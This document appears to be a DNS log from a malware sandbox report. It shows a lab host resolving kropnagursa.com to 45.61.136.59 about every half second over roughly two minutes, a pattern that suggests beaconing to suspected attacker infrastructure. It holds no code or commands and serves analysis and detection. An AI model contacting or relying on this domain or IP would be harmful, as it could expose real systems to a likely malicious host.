                                                                                                                                            Feb 2, 2023 21:17:19.888969898 CET8.8.8.8192.168.2.40xabbNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:20.509862900 CET8.8.8.8192.168.2.40x307bNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:20.996846914 CET8.8.8.8192.168.2.40x4506No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:22.100791931 CET8.8.8.8192.168.2.40x271bNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:22.792406082 CET8.8.8.8192.168.2.40xa645No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:23.558456898 CET8.8.8.8192.168.2.40xa019No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:24.235260010 CET8.8.8.8192.168.2.40x357No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:24.722764969 CET8.8.8.8192.168.2.40xaab4No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:25.286178112 CET8.8.8.8192.168.2.40x8065No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:25.944042921 CET8.8.8.8192.168.2.40x439eNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:26.441790104 CET8.8.8.8192.168.2.40xf869No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:26.934156895 CET8.8.8.8192.168.2.40x67b7No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:27.512058020 CET8.8.8.8192.168.2.40x151fNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:28.178467989 CET8.8.8.8192.168.2.40x6c6aNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:28.978854895 CET8.8.8.8192.168.2.40x9cd5No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:29.469049931 CET8.8.8.8192.168.2.40xcf17No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:30.120381117 CET8.8.8.8192.168.2.40x7310No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:30.808227062 CET8.8.8.8192.168.2.40xf0aNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:31.343502045 CET8.8.8.8192.168.2.40x7d04No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:31.842976093 CET8.8.8.8192.168.2.40x37cfNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:32.449278116 CET8.8.8.8192.168.2.40x2598No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:33.069842100 CET8.8.8.8192.168.2.40x3381No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:33.637011051 CET8.8.8.8192.168.2.40xc275No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:34.310234070 CET8.8.8.8192.168.2.40x310dNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:34.792144060 CET8.8.8.8192.168.2.40x40cfNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:35.302453995 CET8.8.8.8192.168.2.40xeb75No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:35.783725977 CET8.8.8.8192.168.2.40x9c92No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:36.534686089 CET8.8.8.8192.168.2.40x42aeNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:37.029347897 CET8.8.8.8192.168.2.40x2e19No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:37.631731033 CET8.8.8.8192.168.2.40xb3c0No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:38.140654087 CET8.8.8.8192.168.2.40xf865No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:39.048242092 CET8.8.8.8192.168.2.40x7bb0No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:39.740279913 CET8.8.8.8192.168.2.40xbd4cNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:40.226975918 CET8.8.8.8192.168.2.40xd031No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:40.855664015 CET8.8.8.8192.168.2.40xa595No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:41.344110966 CET8.8.8.8192.168.2.40xe145No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:41.814143896 CET8.8.8.8192.168.2.40x68b7No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:42.298166990 CET8.8.8.8192.168.2.40x2b5cNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:42.772540092 CET8.8.8.8192.168.2.40x5dbNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:43.276397943 CET8.8.8.8192.168.2.40xb253No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:43.749233961 CET8.8.8.8192.168.2.40x5836No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:44.407212973 CET8.8.8.8192.168.2.40x4dd4No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:44.889273882 CET8.8.8.8192.168.2.40x828bNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:45.393034935 CET8.8.8.8192.168.2.40x1dc7No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:46.167370081 CET8.8.8.8192.168.2.40xd421No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:46.645600080 CET8.8.8.8192.168.2.40x86e9No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:47.204088926 CET8.8.8.8192.168.2.40x29d8No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:47.686450958 CET8.8.8.8192.168.2.40x6155No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:48.214471102 CET8.8.8.8192.168.2.40xf27cNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:48.691282988 CET8.8.8.8192.168.2.40xd047No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:49.381771088 CET8.8.8.8192.168.2.40xd501No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:49.877317905 CET8.8.8.8192.168.2.40x5db4No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:50.443409920 CET8.8.8.8192.168.2.40x99e1No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:51.248560905 CET8.8.8.8192.168.2.40x5734No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:51.721074104 CET8.8.8.8192.168.2.40xad27No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:53.166543007 CET8.8.8.8192.168.2.40x2295No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:53.648770094 CET8.8.8.8192.168.2.40x8f6aNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:54.133853912 CET8.8.8.8192.168.2.40xac81No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:54.627095938 CET8.8.8.8192.168.2.40x84bdNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:55.187813997 CET8.8.8.8192.168.2.40x2963No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:57.073162079 CET8.8.8.8192.168.2.40xa0aeNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:58.081132889 CET8.8.8.8192.168.2.40x3f54No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:58.587802887 CET8.8.8.8192.168.2.40x3b7No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:59.582622051 CET8.8.8.8192.168.2.40x233aNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:00.100474119 CET8.8.8.8192.168.2.40x2bedNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:00.810810089 CET8.8.8.8192.168.2.40xb5eaNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:01.300815105 CET8.8.8.8192.168.2.40x5f51No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:01.778857946 CET8.8.8.8192.168.2.40x736fNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:02.632424116 CET8.8.8.8192.168.2.40x6281No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:03.106714010 CET8.8.8.8192.168.2.40xa554No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:03.616486073 CET8.8.8.8192.168.2.40x5c4aNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:04.102586031 CET8.8.8.8192.168.2.40x674cNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:04.742147923 CET8.8.8.8192.168.2.40xb69eNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:05.381975889 CET8.8.8.8192.168.2.40xe0a2No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:06.053174973 CET8.8.8.8192.168.2.40x952dNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:06.525763988 CET8.8.8.8192.168.2.40x3060No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:07.413670063 CET8.8.8.8192.168.2.40x9c4No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:07.892153025 CET8.8.8.8192.168.2.40xfc29No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:08.544012070 CET8.8.8.8192.168.2.40x646aNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:09.043183088 CET8.8.8.8192.168.2.40xd5adNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:09.527012110 CET8.8.8.8192.168.2.40x1102No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:09.998792887 CET8.8.8.8192.168.2.40x3a16No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:10.541693926 CET8.8.8.8192.168.2.40xfeabNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:11.021199942 CET8.8.8.8192.168.2.40xb416No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:11.502507925 CET8.8.8.8192.168.2.40x5617No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:12.026077032 CET8.8.8.8192.168.2.40x3807No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:12.563680887 CET8.8.8.8192.168.2.40x2da1No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:13.492031097 CET8.8.8.8192.168.2.40xf23dNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:14.174494982 CET8.8.8.8192.168.2.40xb3dbNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:14.654848099 CET8.8.8.8192.168.2.40x70a8No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:15.365820885 CET8.8.8.8192.168.2.40x9502No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:15.843082905 CET8.8.8.8192.168.2.40x4983No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:16.316849947 CET8.8.8.8192.168.2.40x45c8No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:16.798206091 CET8.8.8.8192.168.2.40xc0bcNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:17.443949938 CET8.8.8.8192.168.2.40xc624No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:18.377084970 CET8.8.8.8192.168.2.40xb21No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:18.866209030 CET8.8.8.8192.168.2.40x1cd7No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:19.344228029 CET8.8.8.8192.168.2.40x15d6No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:19.828419924 CET8.8.8.8192.168.2.40x6b66No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:20.311455965 CET8.8.8.8192.168.2.40x806No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:20.946599007 CET8.8.8.8192.168.2.40xccdeNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:21.729360104 CET8.8.8.8192.168.2.40x94e6No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:22.200498104 CET8.8.8.8192.168.2.40x6016No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:22.682085037 CET8.8.8.8192.168.2.40xbaf5No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:23.231780052 CET8.8.8.8192.168.2.40x5a12No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:23.998733997 CET8.8.8.8192.168.2.40x416eNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:24.468556881 CET8.8.8.8192.168.2.40xd36eNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:24.951041937 CET8.8.8.8192.168.2.40xfb5No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:25.458830118 CET8.8.8.8192.168.2.40xae72No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:25.950428963 CET8.8.8.8192.168.2.40x7fceNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:26.696536064 CET8.8.8.8192.168.2.40xe35bNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:27.184268951 CET8.8.8.8192.168.2.40xb433No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:28.369004011 CET8.8.8.8192.168.2.40xaa52No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:28.870137930 CET8.8.8.8192.168.2.40x4222No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:29.412874937 CET8.8.8.8192.168.2.40xa2c2No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:30.250514030 CET8.8.8.8192.168.2.40x2637No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:30.951838017 CET8.8.8.8192.168.2.40x1c15No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:31.439341068 CET8.8.8.8192.168.2.40x6bebNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:31.908967972 CET8.8.8.8192.168.2.40x2552No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:32.380669117 CET8.8.8.8192.168.2.40x1cfbNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:32.855344057 CET8.8.8.8192.168.2.40x111cNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:33.495223045 CET8.8.8.8192.168.2.40x770bNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:33.984383106 CET8.8.8.8192.168.2.40xfb6bNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:34.733364105 CET8.8.8.8192.168.2.40xe614No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:35.213921070 CET8.8.8.8192.168.2.40x4676No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:35.991157055 CET8.8.8.8192.168.2.40xda91No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:36.466129065 CET8.8.8.8192.168.2.40xbe7No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:37.560602903 CET8.8.8.8192.168.2.40x4c83No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:38.031743050 CET8.8.8.8192.168.2.40x6eafNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:38.575160027 CET8.8.8.8192.168.2.40xa6b8No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:39.073873997 CET8.8.8.8192.168.2.40xcf76No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:39.895473003 CET8.8.8.8192.168.2.40x351bNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:40.399327040 CET8.8.8.8192.168.2.40x68f0No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:40.881726027 CET8.8.8.8192.168.2.40xce4cNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:41.363183022 CET8.8.8.8192.168.2.40xde9cNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:41.846842051 CET8.8.8.8192.168.2.40x5730No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:42.425163031 CET8.8.8.8192.168.2.40xbbbcNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:42.914683104 CET8.8.8.8192.168.2.40xf8cdNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:44.044559956 CET8.8.8.8192.168.2.40xa94No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:44.547945976 CET8.8.8.8192.168.2.40xca56No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:45.038153887 CET8.8.8.8192.168.2.40xc589No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:45.539743900 CET8.8.8.8192.168.2.40xd8a9No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:46.016031981 CET8.8.8.8192.168.2.40x2e7bNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:46.798070908 CET8.8.8.8192.168.2.40xce8aNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:47.287970066 CET8.8.8.8192.168.2.40xc831No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:47.767106056 CET8.8.8.8192.168.2.40x6f92No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:48.481009007 CET8.8.8.8192.168.2.40x66feNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:48.953059912 CET8.8.8.8192.168.2.40x57cNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:49.427557945 CET8.8.8.8192.168.2.40xdf01No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:49.921036959 CET8.8.8.8192.168.2.40x3363No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:50.411756039 CET8.8.8.8192.168.2.40x44dcNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:50.889853954 CET8.8.8.8192.168.2.40x1081No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:51.359636068 CET8.8.8.8192.168.2.40x1b64No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:51.831393957 CET8.8.8.8192.168.2.40xebb3No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:52.337311029 CET8.8.8.8192.168.2.40x892dNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:53.683932066 CET8.8.8.8192.168.2.40x7731No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:54.203874111 CET8.8.8.8192.168.2.40x95dcNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:54.696825027 CET8.8.8.8192.168.2.40xe596No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:55.172012091 CET8.8.8.8192.168.2.40xc277No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:56.180046082 CET8.8.8.8192.168.2.40x15dNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:56.702656984 CET8.8.8.8192.168.2.40x5f2bNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:57.559700012 CET8.8.8.8192.168.2.40x699cNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:58.293989897 CET8.8.8.8192.168.2.40x434eNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:58.777975082 CET8.8.8.8192.168.2.40x6493No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:59.260644913 CET8.8.8.8192.168.2.40xdd2aNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:00.288098097 CET8.8.8.8192.168.2.40x2278No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:00.850075960 CET8.8.8.8192.168.2.40x19beNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:01.611984015 CET8.8.8.8192.168.2.40x4407No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:02.140727997 CET8.8.8.8192.168.2.40xea7eNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:02.622668028 CET8.8.8.8192.168.2.40x2e25No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:03.099140882 CET8.8.8.8192.168.2.40xa985No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:03.584048986 CET8.8.8.8192.168.2.40x87baNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:04.071101904 CET8.8.8.8192.168.2.40xbfe4No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:04.572865009 CET8.8.8.8192.168.2.40xc4acNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:05.088288069 CET8.8.8.8192.168.2.40x52a1No error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:19:05.568283081 CET8.8.8.8192.168.2.40x1cbaNo error (0)kropnagursa.com45.61.136.59A (IP address)IN (0x0001)false
